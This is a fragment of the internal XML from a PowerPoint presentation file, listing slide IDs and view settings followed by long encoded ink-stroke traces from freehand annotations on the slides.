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notesSlides/notesSlide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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84" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="268" r:id="rId6"/>
    <p:sldId id="269" r:id="rId7"/>
    <p:sldId id="273" r:id="rId8"/>
    <p:sldId id="270" r:id="rId9"/>
    <p:sldId id="271" r:id="rId10"/>
    <p:sldId id="259" r:id="rId11"/>
    <p:sldId id="285" r:id="rId12"/>
    <p:sldId id="286" r:id="rId13"/>
    <p:sldId id="287" r:id="rId14"/>
    <p:sldId id="260" r:id="rId15"/>
    <p:sldId id="261" r:id="rId16"/>
    <p:sldId id="288" r:id="rId17"/>
    <p:sldId id="289" r:id="rId18"/>
    <p:sldId id="262" r:id="rId19"/>
    <p:sldId id="264" r:id="rId20"/>
    <p:sldId id="265" r:id="rId21"/>
    <p:sldId id="266" r:id="rId22"/>
    <p:sldId id="278" r:id="rId23"/>
    <p:sldId id="279" r:id="rId24"/>
    <p:sldId id="263" r:id="rId25"/>
    <p:sldId id="290" r:id="rId26"/>
    <p:sldId id="267" r:id="rId27"/>
    <p:sldId id="291" r:id="rId28"/>
    <p:sldId id="280" r:id="rId29"/>
    <p:sldId id="281" r:id="rId30"/>
    <p:sldId id="282" r:id="rId31"/>
    <p:sldId id="276" r:id="rId32"/>
    <p:sldId id="275" r:id="rId33"/>
    <p:sldId id="277" r:id="rId34"/>
    <p:sldId id="28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4" autoAdjust="0"/>
    <p:restoredTop sz="94705" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="108" d="100"/>
          <a:sy n="108" d="100"/>
        </p:scale>
        <p:origin x="67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0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5T14:35:28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2 832 24575,'0'98'0,"0"0"0,0-26 0,0 2 0,0 5 0,0 1 0,0 6 0,0 2 0,0 1-2458,0 2 0,-1 1 1,0 2-1,3 6 2209,3-12 1,0 4 0,3 3 0,0 2-1,0 0 1,1-3-112,0-2 1,-1-2 0,1 0 0,1 1 0,2 1 0,3 3 359,-1-13 0,1 1 0,2 1 0,2 1 0,0 1 0,2 2 0,0 2 0,2 2-88,0-1 0,1 2 0,1 3 0,2 2 0,1 1 0,0 0 1,0 0-1,1-1 0,-1-2 0,0-2 88,1 1 0,0-1 0,1-2 0,-1-1 0,1 0 0,0 1 0,0-1 0,1 2 0,-1 2-86,-1-2 1,1 1-1,0 1 1,0 1 0,0 0-1,0 0 1,0 0 0,-1 0-1,1-1 1,-1-1 85,0-4 0,-1 1 0,1 0 0,-1 1 0,1-2 0,-1-1 0,-1-1 0,0-2 0,-1-3 0,0-2 0,2 8 0,-1-3 0,-1-3 0,0-2 0,-1-1 0,0-1 0,0 0 0,2 10 0,0 1 0,0-1 0,0-3 0,-2-5 0,-1-6 0,11 28 0,-3-9 0,-6-29 2611,-6-33-2611,-2 17 3903,-9-4-3903,-9 27 0,0 6 0,0 6 0,0-18 0,0 3 390,0 1 0,0 7 0,0 1-390,2 13 0,1 3 0,1-4 1049,-1-18 0,0-3 0,1 5-1049,0-1 0,1 5 0,0 0 0,0-7 0,4 21 0,1-3-49,-2-25 1,1 2-1,2 3 49,6 25 0,4 6 0,-1-6 0,-4-24 0,0-4 0,1 3 0,5 26 0,2 6 0,1-12 0,7-6 0,0-12 0,-10-21 0,3-6 0,34 20 913,-33-59-913,24-5 3425,13 0-3425,3 1 0,25 1 0,13 0 0,1 0 0,-8-1 0,-2 0 0,-5-1 0,2 1 0,8-1-1033,-7 1 0,9 1 0,3-1 0,0 1 0,-4-1 0,-8 0 1033,3 0 0,-8-1 0,-1 0 0,7-1 0,-8 1 0,6 0 0,3-1 0,0 0 0,-3-1 0,-7-2-948,8-3 0,-8-2 0,0-1 0,6 2 948,4 3 0,9 2 0,0 0 0,-5-2 0,-12-3-111,-7-7 0,-10-3 1,0 2 110,0 5 0,-1 3 0,2 0 0,5-2 0,3 1 0,4 0-250,-2 4 1,3 0 0,3 1 0,-1 1 249,2 0 0,0 0 0,1 2 0,2-1 0,-12 2 0,3 1 0,0-1 0,0 0 0,-1-1 156,20-2 1,0-2-1,-1 0 1,-3 1-157,-10 1 0,-4 2 0,1-2 0,1-4 0,10-5 0,3-4 0,-2-1 0,-11 0 679,-13 4 0,-8-1 0,1-1-679,6-5 0,2-2 0,-1-3 89,3-6 0,1-2 0,-11 2-89,-17 5 0,-1 0 0,40-14 0,-10 5 0,-43 12 1322,-19 17-1322,-4 1 4737,-5-5-4737,-1-9 2309,-5-20-2309,0-16 0,0-18 0,-8 8 0,-6-21 0,-3-13 0,-1-3 0,2 6-958,2 7 0,0 2 1,1-1-1,-1-5 1,-2-7 957,4 21 0,-2-4 0,0-3 0,-1-3 0,0-3 0,0-2 0,0-2 0,0-2 0,1-1 0,3 13 0,-1-2 0,0-2 0,0-1 0,1-3 0,-1 0 0,1-2 0,-1 0 0,1-2 0,1 1 0,-1-1 0,2-1 0,-1 2-342,2 5 0,0-1 0,0-1 0,1-1 0,0 0 0,0-1 0,0 0 0,1-1 0,-1 1 0,1 0 0,0 1 0,0 0 0,-1 1 0,1 2 0,-1 1 342,0-5 0,-1 1 0,1 2 0,-1 0 0,1 1 0,-1 0 0,1 1 0,-1-1 0,1 1 0,1 0 0,-1-1 0,2-1 0,-1 0 0,1-5 0,1-5 0,-1-4 0,1-1 0,1-1 0,-1 1 0,1 2 0,0 4 0,1 4 0,0 6 0,0 8 0,1 9 0,0 10 0,0-29 0,1 21 0,1-6 0,-1-18 0,0-12 0,0 9 0,0 27 0,0 17 0,0 9 0,0-8-508,-5-25 0,0-4 508,5 12 0,-2-7 0,-5 6 0,-3-9 0,0-7 0,1-5 0,3 10 0,2-6 0,1-4 0,-1-1 0,1 1 0,-1 4 0,-2-4 0,-1 4 0,0 0 0,1-1 0,0-3 0,1 3 0,1-5 0,0-2 0,0 2 0,0 6 0,1 9 0,0-17 0,1 10 0,-1 5 0,-2 13 0,0 3 0,0 3 0,0-15 0,1 5 1506,1 14 0,0 5-1506,-3-24 6118,-1 12-6118,-11-14 0,10 30 0,-3 8 2011,6 26-2011,-1 7 0,-5 5 0,1 5 0,-1 0 0,-5 0 0,-12 0 0,-44 11 0,13 4 0,-10 6 0,-6 3 0,18-5 0,-3 2 0,-27 10 0,-6 0 0,1-6 0,-6 3 0,25-3 0,-5 4 0,-3 1 0,0 0-670,-3-1 0,-1 0 1,-1 0-1,-3 1 670,4-1 0,-2 1 0,-2 1 0,0 0 0,1-2 0,2 0 0,0-1 0,0 0 0,2-2 0,4-1-831,-1-3 0,2-1 1,3-2-1,0 0 831,-18 7 0,1-1 0,5-4 0,-5-5 0,-1-2-112,13-1 0,-6 2 0,-7 0 112,10-2 0,-8 0 0,-3 0 0,1 0 0,7 0 0,3-1 0,5-1 0,1 0 0,-4 1-142,2-1 0,-6 2 0,0 0 1,5-1-1,10-2 142,-24 3 0,9-2 0,-1 2 0,-2-1 673,23-3 0,-3-1 0,-3 0-673,-17-2 0,-4-1 0,9-1 0,7 0 0,0-1 0,-6-2 0,-7-2 0,14 1 2751,-12 0-2751,19 0 0,-4 0 217,-6 0 0,2 0-217,15 0 0,1 0 0,-9 1 0,-3-2 0,-14-10 0,8-3 0,5 2 327,10-3 1,-10-6 0,6 1-328,11 2 0,1 0 0,-9-2 0,-7-1 0,8 2 0,11 4 0,2 1 2,-17-2 0,3 3-2,0 1 0,13 0 0,0-1 0,-10-7 856,-11-3-856,31 6 0,8 3 0,-29-9 0,-21-7 0,7 3 0,-9-3 0,40 13 0,22 6 0,3 5 0,10 1 0,-5 5 0,-1 0 0,-4 5 0,-1-4 0,0 4 0,1-5 0,4 0 0,-4 0 0,9 0 0,-3 0 0,-1 0 0,4 0 0,1 5 0,2-4 0,8 8 0,-4-3 0,5 5 0,0 4 0,0-8 0,0 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5T14:38:14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65 588 24575,'0'17'0,"0"-2"0,0 0 0,5-3 0,-4 4 0,14 5 0,-8-8 0,4 8 0,-6-20 0,-5-7 0,0-22 0,-17-22 0,-4-6 0,6-24 0,-8 22 0,2 5 0,15 10 0,0 21 0,6 6 0,0-1 0,0-4 0,0 9 0,0-3 0,5 4 0,1 0 0,10-5 0,0-1 0,6-4 0,-11 4 0,4 1 0,5-4 0,-6 7 0,16-8 0,2 5 0,-6 4 0,5 0 0,-4 2 0,-14 9 0,8-9 0,-5 8 0,-4-2 0,3-1 0,-9 4 0,-1-4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1:34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24575,'0'23'0,"0"30"0,0-15 0,0 23 0,5 1 0,3 5 0,0-11 0,5 27 0,-6-58 0,7 42 0,-2-34 0,2 38 0,-1-27 0,11 36 0,-3-18 0,3-8 0,-12-6 0,-8-30 0,1 12 0,-4-16 0,9 11 0,-4-14 0,0-6 0,-2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1:37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0 208 24575,'35'-35'0,"-9"20"0,9-17 0,-7 19 0,-3-10 0,-3 5 0,5-4 0,-14 15 0,8-8 0,-5 9 0,6 0 0,-4 1 0,28 0 0,-12 4 0,17-4 0,-5 5 0,-6 0 0,1 0 0,-7 5 0,-7 6 0,-6 5 0,1 11 0,5 6 0,-9-8 0,3 1 0,-15-5 0,3-3 0,-8 15 0,4-5 0,-5 16 0,0-12 0,0 27 0,-5-31 0,-17 26 0,7-34 0,-16 15 0,19-21 0,1 6 0,-3-14 0,6-2 0,-7-4 0,9 5 0,-4-4 0,4 9 0,-5-9 0,5 9 0,-3-9 0,3 8 0,15-8 0,0 4 0,25-10 0,8-2 0,-2-6 0,8 1 0,-10 0 0,33-7 0,-32 11 0,41-9 0,-48 16 0,14-5 0,-18 6 0,-1 0 0,-5 0 0,-1 0 0,1 0 0,4 0 0,2 10 0,0 1 0,-6 6 0,-7-1 0,-9-1 0,-1 2 0,-5 4 0,0 21 0,0-15 0,0 16 0,0-19 0,0-1 0,0 25 0,-6-13 0,-4 24 0,2-29 0,-7-3 0,-1 5 0,3-12 0,-29 27 0,16-20 0,-18 10 0,9-15 0,-4 1 0,3-6 0,-14 5 0,18-15 0,-6 3 0,14-5 0,1-4 0,-20 4 0,10-5 0,-17 0 0,16 0 0,5 0 0,2 0 0,6 0 0,4 0 0,1 0 0,5 0 0,1 0 0,3 5 0,3-4 0,4 4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1:52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24575,'0'23'0,"0"18"0,0 24 0,0 28 0,0-16 0,0-16 0,0-1 0,0 4 0,0-14 0,0 3 0,0 0 0,0-2 0,0 24 0,0-5 0,0 2 0,0 24 0,2-41 0,2 0 0,4 41 0,1-45 0,3 2 0,-2 2 0,2 1 0,1 11 0,2 2 0,2 3 0,-1-1 0,-5-11 0,0-4 0,13 35 0,-9-28 0,2-40 0,4-3 0,12-4 0,-8 7 0,13 49 0,-24-26 0,1 33 0,-15-26 0,0 20 0,-2-12 0,-2 2 0,-3 30 0,1-27 0,-2-6 0,-4-15 0,4 15 0,3-20 0,5-8 0,0 1 0,0-8 0,0-8 0,0 5 0,0-7 0,0-4 0,0 0 0,0-1 0,0-4 0,0-1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1:53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24575,'0'23'0,"0"2"0,0 31 0,0-21 0,0 34 0,0-8 0,0 5 0,0 6 0,0-1 0,0-10 0,0 7 0,0-15 0,0-23 0,0 22 0,0-12 0,0 17 0,10-4 0,-2-12 0,13-7 0,-4-12 0,-5-12 0,-2-5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1:54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0 327 24575,'28'0'0,"-14"0"0,26-6 0,-14-6 0,35-14 0,-10 5 0,13-16 0,14-5 0,-23 11 0,10-7 0,3 13 0,-21 4 0,21-10 0,-9 12 0,-22 7 0,-3 6 0,-13 6 0,-10 0 0,10 0 0,-9 0 0,8 0 0,-8 0 0,-2 0 0,-5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1:55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24575,'32'0'0,"29"0"0,-8 0 0,21-6 0,-12-2 0,2-5 0,-8-6 0,-4 5 0,1 2 0,11-5 0,18 0 0,-46 11 0,-18 5 0,4-4 0,-10 5 0,-1 0 0,-6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1:56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24575,'68'0'0,"8"0"0,-21 0 0,0 0 0,26 0 0,-10 0 0,2 0 0,27 0 0,-48 0 0,0 0 0,26 0 0,-30 0 0,-20 0 0,5 0 0,-27 0 0,-1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1:57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0 565 24575,'0'-33'0,"0"4"0,0-19 0,0 0 0,0 8 0,10-2 0,3 2 0,0 14 0,3-13 0,-15 15 0,14-4 0,-8 10 0,8-3 0,-4 3 0,0-4 0,1 9 0,-1-7 0,-1 8 0,-4-5 0,4 6 0,-9 1 0,9 9 0,-4-4 0,9 10 0,-3 1 0,3 5 0,-4 10 0,1-2 0,-1 3 0,5 10 0,-3-12 0,4 14 0,-6-11 0,11 26 0,-13-20 0,11 19 0,-13-20 0,-1-1 0,4 1 0,-9-2 0,4-4 0,-1-1 0,-2 1 0,2-6 0,-4 0 0,5-6 0,-4-4 0,4-1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1:58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24575,'26'0'0,"-11"0"0,10 0 0,-9 0 0,-4 0 0,3 0 0,1 0 0,-4 0 0,5 0 0,-7 0 0,1 0 0,-5 0 0,-1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2:00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24575,'0'43'0,"0"-8"0,0 18 0,0-30 0,0 28 0,0-25 0,0 22 0,0-14 0,0 6 0,0-7 0,0-8 0,0 8 0,0-17 0,0 0 0,0-10 0,0-2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5T14:38:17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24575,'10'11'0,"6"4"0,-9-3 0,7 4 0,-8-6 0,5 1 0,0 0 0,4 9 0,2-2 0,14 8 0,-17-9 0,10-7 0,-23 0 0,4-4 0,-1 0 0,-2-2 0,2-4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2:01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24575,'17'0'0,"-5"0"0,4 0 0,-5 0 0,4 0 0,-3 0 0,13 0 0,-12 0 0,7 0 0,-4 0 0,-5 0 0,10 0 0,-9 5 0,8 0 0,-8 6 0,3 0 0,-4 0 0,-1 4 0,-4-3 0,4 3 0,-9-4 0,4 0 0,-5-1 0,0 1 0,0 5 0,0-5 0,-10 10 0,3-9 0,-9 3 0,1-4 0,3-1 0,-4 1 0,0 0 0,0 4 0,-11-3 0,4-1 0,2-6 0,0-1 0,9-2 0,-3 2 0,4-4 0,5 0 0,1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2:04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24575,'0'3'0,"0"0"0,0 12 0,0-4 0,0-1 0,0 1 0,5 0 0,1-5 0,4-1 0,-4-1 0,4-3 0,-4 4 0,0 0 0,3-4 0,-3 4 0,5-5 0,0 0 0,-1 0 0,1 0 0,-5 5 0,3-4 0,-3 8 0,5-7 0,0 2 0,-1-4 0,1 0 0,0 0 0,0 0 0,-1 0 0,-4-5 0,4 4 0,-9-8 0,4 3 0,-5-5 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 10 0,9 11 0,-7 9 0,13 3 0,-9 4 0,0-7 0,3 3 0,-8 0 0,9-5 0,-4 11 0,5-5 0,0 4 0,0-6 0,-5-4 0,3-2 0,-8 5 0,9-2 0,-9 3 0,9-10 0,-9-6 0,4-5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2:05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24575,'0'21'0,"0"-8"0,0 18 0,0-18 0,0 7 0,0-9 0,0 5 0,0 1 0,0 0 0,0 3 0,0-8 0,0 4 0,0-1 0,0-3 0,0 9 0,0 1 0,0-3 0,0 8 0,0-10 0,0 7 0,0 14 0,5-6 0,-4 6 0,9-5 0,-9-5 0,10 6 0,-10-10 0,4-3 0,-5-6 0,0-3 0,5 8 0,-4-8 0,4 3 0,-5-4 0,0 0 0,0-5 0,0-1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2:07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24575,'23'0'0,"-7"0"0,5 0 0,-9 0 0,4 0 0,-5 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,4 0 0,-3 0 0,8 0 0,-8 5 0,4 1 0,-11 4 0,5-4 0,-9 4 0,4 0 0,-5 2 0,0 8 0,0-8 0,0 9 0,0-10 0,0 5 0,0-5 0,-10 4 0,-2 2 0,-9 4 0,-1 0 0,0 1 0,6-6 0,0 5 0,0-5 0,9 1 0,-7-6 0,12-2 0,-7-8 0,3 9 0,-5-9 0,5 9 0,1-9 0,5 3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1:09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1 734 24575,'0'-18'0,"0"-9"0,0 8 0,0-9 0,0-12 0,0 1 0,0-10 0,0 7 0,0 0 0,0-2 0,0 8 0,0 1 0,0 1 0,0 3 0,0-16 0,0 5 0,0 4 0,9 4 0,-2 7 0,4 4 0,-1 6 0,-4 6 0,4 6 0,1 4 0,0-4 0,-1 5 0,1 0 0,4 0 0,19 27 0,3 7 0,24 35 0,-21-10 0,4-1 0,-15 0 0,-2 2 0,1 3 0,-3-3 0,-1 0 0,-5 11 0,-5-20 0,5 10 0,-7-30 0,0-1 0,-6-7 0,5 5 0,-5 1 0,0 0 0,4 9 0,-5-13 0,1 6 0,-1-14 0,-5-6 0,0-7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1:10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24575,'63'0'0,"-26"0"0,18 0 0,-1 0 0,-23 0 0,29 0 0,-26 0 0,-8 0 0,0 0 0,-20 0 0,-1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1:12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24575,'0'11'0,"0"-1"0,0 1 0,0 4 0,0 8 0,0-5 0,0 8 0,0-3 0,0 1 0,0 4 0,0 0 0,0-4 0,0 4 0,0 6 0,5 8 0,-4 13 0,15 22 0,-13-29 0,8 20 0,-6-42 0,-4 13 0,4-15 0,-5-2 0,0-6 0,0-11 0,0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1:13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24575,'11'0'0,"-2"0"0,25 0 0,-10 0 0,3 0 0,-10 0 0,3 0 0,-8 0 0,4 0 0,4 0 0,-7 0 0,7 0 0,-9 0 0,0 0 0,4 0 0,-3 0 0,3 0 0,-4 0 0,-5 5 0,4 1 0,-9 14 0,3-7 0,-4 12 0,0-13 0,0 4 0,0-6 0,0 21 0,0-5 0,-5 17 0,-6-14 0,-17 8 0,9-17 0,-13 16 0,15-18 0,0 4 0,1-11 0,6-6 0,-1-5 0,0 0 0,0 0 0,0 0 0,5 0 0,1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1:15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57 317 24575,'0'-17'0,"-10"-5"0,7-3 0,-12-3 0,9-6 0,-1 9 0,-3-4 0,9 3 0,-4 12 0,5-7 0,0 10 0,0 0 0,0 1 0,0-1 0,5 0 0,1 5 0,0-4 0,3 9 0,-3-4 0,5 5 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,6 0 0,-4 0 0,3 0 0,-4 0 0,-5 0 0,-2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1:17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24575,'0'11'0,"0"5"0,0-4 0,0 4 0,0-5 0,0 4 0,0 3 0,0-1 0,0-1 0,0-5 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,5-5 0,-4 4 0,8-9 0,-3 4 0,0-5 0,-1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5T14:38:38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24575,'11'0'0,"11"0"0,-8-5 0,14 9 0,-16-2 0,10 4 0,-4 4 0,-1-9 0,0 9 0,4 6 0,-3 2 0,20 10 0,-14-6 0,29 21 0,-25-21 0,15 20 0,-20-29 0,-4 9 0,9-9 0,8 15 0,3-3 0,29 11 0,-39-13 0,40 14 0,-28-13 0,-4 4 0,-4-13 0,-32-5 0,4-4 0,-5 0 0,0-2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1:18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1:20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24575,'6'5'0,"-1"1"0,0 5 0,-4-1 0,9 1 0,-4 0 0,4 0 0,-4-1 0,4-4 0,-4 8 0,4-2 0,1 5 0,0 3 0,-1-3 0,1-1 0,0 5 0,0-5 0,-6 1 0,10 3 0,-13-8 0,12 3 0,-12-4 0,7 0 0,-3-5 0,0 3 0,3-8 0,-3 4 0,5-10 0,-5-6 0,-1-1 0,0-10 0,0 10 0,1-9 0,4 4 0,-9-5 0,9 0 0,-4 1 0,-1-1 0,5 5 0,-9 1 0,9 1 0,-4-2 0,4-5 0,-4 5 0,4 2 0,-9-6 0,4 8 0,-1-2 0,-2 5 0,2 9 0,-4-4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2:27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1785 7 24575,'-52'0'0,"3"0"0,15 0 0,0 0 0,-8 0 0,-4 0 0,18 0 0,-19 0 0,-1 0 0,13 0 0,-42 0 0,0 0 0,-9 0 0,-10 0 0,7 0 0,-3 0 0,38 0 0,0 0 0,-42 0 0,18 0 0,11 0 0,3 36 0,-4 4 0,13 20 0,-1 9 0,28-27 0,-21 43 0,12-24 0,13-12 0,1 6 0,0 11 0,3 0 0,4-7 0,3 1 0,1 19 0,4-1 0,4-25 0,2-3 0,1 2 0,2-3 0,9 27 0,9-8 0,18 9 0,-6-29 0,4 19 0,-8-31 0,-3-1 0,2-4 0,-4-19 0,-1 3 0,-4-10 0,3 11 0,1 5 0,-3-3 0,13 23 0,-18-20 0,4 18 0,-2-6 0,-2-2 0,0 3 0,2-6 0,1 16 0,-2-16 0,14 27 0,-16-35 0,5 12 0,9-9 0,32 17 0,-15-13 0,24 6 0,-25-21 0,22-5 0,6 3 0,-13-8 0,0-2 0,17 5 0,20-5 0,-16 0 0,14 0 0,-39-2 0,3-2 0,10 1 0,0-2 0,-8-4 0,4-2 0,13 0 0,8-1 0,-3 0 0,5 0 0,-2-1-482,-12 2 0,2-1 1,-7 1 481,-7 4 0,-5 0-193,-1-1 1,-2 1 192,29-1 0,-29 2 0,1 0 0,36-2 0,-10-6 0,11 7 0,-6-10 1416,1 8-1416,-29-8 0,-2-2 0,19-4 207,-26 0 0,-3-1-207,-3-4 0,2-13 0,-6-8 0,-15 7 0,8-29 0,-10 25 0,-5-20 0,-4 18 0,-10-12 0,0 12 0,0-11 0,-11 10 0,-2-4 0,-20 2 0,12 13 0,-26-15 0,25 26 0,-32-27 0,16 21 0,-13-17 0,1 0 0,-4-5 0,13 9 0,4 11 0,-1 0 0,-4-6 0,-2 6 0,0-1 0,4-1 0,-21-13 0,25 18 0,-16-18 0,5 13 0,1-8 0,0 10 0,5 6 0,0 1 0,-9-1 0,18 10 0,-11-2 0,14 5 0,-10-7 0,3 4 0,2-2 0,1 5 0,-1-2 0,-1 1 0,-10 6 0,10 2 0,-5 7 0,6-2 0,5 4 0,-18 0 0,25 0 0,-18 0 0,28 0 0,-4 0 0,5 0 0,-4 0 0,3 0 0,-4 0 0,5 0 0,5 0 0,1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2:39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24575,'0'54'0,"0"22"0,0 3 0,0 7 0,0 0 0,0-25 0,0 18 0,0-17 0,0-21 0,0 2 0,0-15 0,0-16 0,0 4 0,0-15 0,0-2 0,0-10 0,0 1 0,0-17 0,0 6 0,0-19 0,0 2 0,0-2 0,0-53 0,6 20 0,-6 21 0,1 1 0,10-17 0,-10 21 0,9 12 0,-9 8 0,4 10 0,0 2 0,1 9 0,4-4 0,1 4 0,-5-5 0,-1 1 0,-5-6 0,5-2 0,-4 1 0,4-9 0,-5 7 0,0-8 0,5 15 0,6 7 0,1 11 0,4 10 0,0 12 0,-3-2 0,4 14 0,0-5 0,-4-3 0,4 8 0,0-10 0,-4 1 0,8 1 0,-3 3 0,4 0 0,-4-1 0,-2-1 0,-5-11 0,-5 1 0,4-8 0,-9-4 0,8-1 0,-3-4 0,5-1 0,0-10 0,-5-1 0,-2-10 0,-4-2 0,6-12 0,1-51 0,5 20 0,1-34 0,-7 48 0,5 7 0,-5 12 0,0 0 0,4 12 0,-9 0 0,8 5 0,-3-5 0,5 4 0,0-8 0,-1 3 0,-4 0 0,4 7 0,-4 5 0,4 5 0,-4 4 0,4 2 0,1 21 0,7 10 0,6 24 0,1 8 0,0-1 0,4 20 0,-14-39 0,6 22 0,-15-50 0,6 26 0,-6-26 0,4 27 0,-5-28 0,7 21 0,-6-27 0,4 12 0,-9-11 0,8 2 0,-8 4 0,4-4 0,0-2 0,-4-4 0,4-5 0,-5-1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1:48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1 836 24575,'0'-36'0,"0"-4"0,0-8 0,0 6 0,0-20 0,0 29 0,0-18 0,0 25 0,0-25 0,0-24 0,0 3 0,0 22 0,0 0 0,5-13 0,-3 14 0,8 21 0,-9 7 0,8 9 0,-3-4 0,5 10 0,0 1 0,-1 5 0,1 0 0,0 0 0,-1 5 0,2 7 0,-1 5 0,5 17 0,26 48 0,-7-11 0,-10-17 0,-2 1 0,8 20 0,-6-6 0,4 2 0,-4-16 0,-2 2 0,-6-11 0,-6-15 0,10 31 0,-12-38 0,11 29 0,-14-32 0,0-4 0,-2-7 0,-4-5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1:50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24575,'16'0'0,"7"0"0,-5 0 0,3 0 0,-10 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,4 0 0,2 0 0,0 0 0,-7 0 0,-5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2:15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24575,'0'34'0,"0"-8"0,0 22 0,0-21 0,0 6 0,0-11 0,0-10 0,5 14 0,0-8 0,6 9 0,0-5 0,-5-1 0,-1-4 0,-1-7 0,-2 0 0,2 1 0,1 0 0,-4 0 0,4-6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2:17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1 224 24575,'5'-11'0,"6"0"0,1-5 0,5-3 0,-1 1 0,-3-3 0,3 9 0,-5-4 0,-1 5 0,1-5 0,0 8 0,5-12 0,-4 13 0,3-8 0,-4 8 0,4-2 0,-3 8 0,4-4 0,-1 5 0,-3 0 0,4 0 0,-6 0 0,1 0 0,-5 9 0,-1-2 0,-5 9 0,0-5 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 6 0,-5-9 0,-1 7 0,-5-3 0,0-4 0,0 7 0,1-3 0,-1-4 0,0 8 0,0-10 0,5 6 0,-4 0 0,9 0 0,-8-6 0,7 5 0,-7-9 0,3 9 0,-5-9 0,0 8 0,5-3 0,1 0 0,5-1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2:20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24575,'0'11'0,"0"0"0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 4 0,0-3 0,0 4 0,0-6 0,5-4 0,1-1 0,4-5 0,1 0 0,0 5 0,-1-4 0,1 4 0,0-5 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1-10 0,-4 3 0,-1-9 0,-5 6 0,0-1 0,0 0 0,0 0 0,5 0 0,-4 0 0,4 1 0,-5-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 10 0,5 11 0,-4 3 0,3 8 0,1-6 0,1-3 0,0 9 0,4-4 0,-9 0 0,8-1 0,-7-1 0,2-3 0,-4 4 0,5-11 0,1 0 0,5-5 0,-1 0 0,1 0 0,0 0 0,-5 0 0,-2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2:21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24575,'0'11'0,"0"10"0,0-8 0,0 8 0,0 5 0,0-6 0,0 7 0,0-1 0,0-12 0,0 7 0,0-11 0,0 10 0,0-6 0,0 6 0,0-10 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,10 4 0,-3 6 0,3 2 0,0-2 0,-9 0 0,9-10 0,-9 5 0,4-5 0,-1-5 0,-3 3 0,4-3 0,-5 5 0,0-1 0,5-4 0,-4 4 0,4-9 0,-5 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5T14:38:40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0 24575,'-17'38'0,"10"-15"0,-15 28 0,13-15 0,-3-4 0,-4 3 0,2 5 0,-9-4 0,-1 7 0,7-6 0,6-12 0,1-3 0,-1 10 0,-7 3 0,5 2 0,-18 26 0,21-29 0,-22 21 0,20-27 0,-5-1 0,7-5 0,-6 4 0,9-8 0,-12 7 0,11-9 0,-12 6 0,8-1 0,-4-4 0,10-7 0,1-5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2:23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24575,'10'0'0,"1"0"0,4 0 0,-3 0 0,4 0 0,-1 0 0,3 0 0,-1 0 0,9 0 0,-8 0 0,9 0 0,-6 0 0,1 0 0,-1 0 0,-4 5 0,3 1 0,-8 4 0,8 6 0,-8-4 0,3 3 0,-4-4 0,0-5 0,-5 3 0,-1-3 0,-5 5 0,0 0 0,0-1 0,0 1 0,0 0 0,-5-1 0,-1 1 0,-5-5 0,5 3 0,-4-7 0,-1 7 0,-5-3 0,-6 10 0,0 0 0,0 1 0,0-2 0,4-4 0,3-5 0,4-1 0,5-1 0,-4-2 0,4 2 0,0-4 0,2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2:47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708 0 24575,'-11'0'0,"-6"0"0,5 0 0,-4 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-5 0 0,3 0 0,-21 0 0,14 0 0,-9 0 0,7 6 0,3 16 0,-15 27 0,23-1 0,-9 3 0,1 1 0,11-4 0,-26 44 0,25-42 0,1 11 0,8-6 0,5-3 0,0 1 0,0-10 0,0 3 0,0-13 0,0-4 0,9 2 0,-2-13 0,14 2 0,-9-14 0,3-1 0,-4-5 0,-1 0 0,26 0 0,-14 0 0,20 0 0,-11 0 0,-12 0 0,-3 0 0,-38 0 0,6 0 0,-32 0 0,28 0 0,-14 0 0,11 0 0,-11 0 0,-2 10 0,-21-2 0,18 9 0,-4-6 0,20 0 0,1 0 0,6 4 0,5-3 0,6 4 0,5-6 0,-5 1 0,4 0 0,-4 10 0,5-8 0,0 24 0,0-7 0,0 17 0,5 20 0,1-21 0,6 9 0,-6-32 0,9 3 0,6 2 0,-1-4 0,10 6 0,-19-18 0,10 13 0,-5-12 0,1 2 0,-2-5 0,1-9 0,1 4 0,-1-5 0,0 0 0,-6 0 0,6 0 0,0 0 0,6 0 0,5 0 0,11 0 0,-13 0 0,21 0 0,-31 0 0,20 0 0,-22 0 0,7-5 0,-9-1 0,-1-5 0,1 0 0,5 0 0,-5 5 0,5-3 0,9-2 0,-11-1 0,11 1 0,-19 2 0,-1 7 0,-5-2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2:50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1494 0 24575,'0'41'0,"0"-11"0,0 13 0,-21 20 0,3-6 0,-12 16 0,7-8 0,1-3 0,-3-7 0,3-5 0,0 3 0,-10 41 0,5-42 0,13 1 0,1 2 0,-18 19 0,9-13 0,-11 23 0,2-25 0,7 6 0,-6-1 0,-9 8 0,8-21 0,-24 28 0,26-30 0,-24 19 0,23-27 0,0 0 0,-29 27 0,22-25 0,0 0 0,-13 18 0,-5 0 0,1-6 0,11-7 0,-24-3 0,38-25 0,-28 1 0,42-21 0,-32 0 0,31 0 0,-25 0 0,17 0 0,-5-5 0,-4-2 0,6-4 0,3 5 0,4 1 0,9 5 0,5 0 0,1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2:52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0 24575,'0'16'0,"0"-4"0,0 3 0,0-4 0,0 0 0,0 4 0,-10-3 0,7 9 0,-18-9 0,19 4 0,-9 0 0,11-4 0,-4 8 0,-2-8 0,-5 8 0,5-8 0,-4 3 0,9-4 0,-9 0 0,9-1 0,-9-4 0,4 4 0,0-4 0,-8 14 0,7-7 0,-9 12 0,5-9 0,1-4 0,8-2 0,3-10 0,20 0 0,-7 0 0,12 5 0,-8 1 0,15 6 0,-2-1 0,8 6 0,-10-5 0,-2 3 0,-6-4 